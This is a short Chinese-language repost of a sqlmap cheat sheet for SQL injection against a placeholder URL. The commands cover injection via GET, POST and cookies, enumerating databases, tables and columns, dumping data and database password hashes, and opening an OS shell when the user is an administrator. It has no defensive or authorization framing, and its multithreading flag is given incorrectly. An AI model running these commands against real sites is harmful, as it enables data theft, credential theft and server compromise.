sqlmap命令

网友投稿 286 2022-10-25


sqlmap命令

SQLMAP

GET   方式的注入  sqlmap.py -u "URL"

POST  方式的注入  sqlmap.py -u "URL" --data "POST参数=POST数值"

COOKIE 方式的注入  sqlmap.py -u "URL" --cookie "cookies 值"

爆数据库名(cookie根据实际的情况)  sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs

爆目标数据库中的表     sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --tables

爆目标数据表字段  sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 --columns

导出目标字段的数据 sqlmap.py  -u "URL"  [--cookie "cookies 值"] -D 数据库名 -T 表名 -C 要导出数据的字段名,多个字段用逗号分隔 --dump

爆出目标库有多少数据    sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --count

检测当前用户        sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user

检测当前用户是否管理员  sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba

检测数据库用户       sqlmap.py -u "URL" [--cookie "cookies 值"]  --user -v 0

检测数据库用户密码    sqlmap.py -u "URL" [--cookie "cookies 值"]  --password -v 0

检测当前数据库       sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db

多线程            -threading 5

如果是管理员,我们可以写Shell

操作系统Shell写入

sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:盲注代码
下一篇:详细总结Java堆栈内存、堆外内存、零拷贝浅析与代码实现
相关文章

 发表评论

评论列表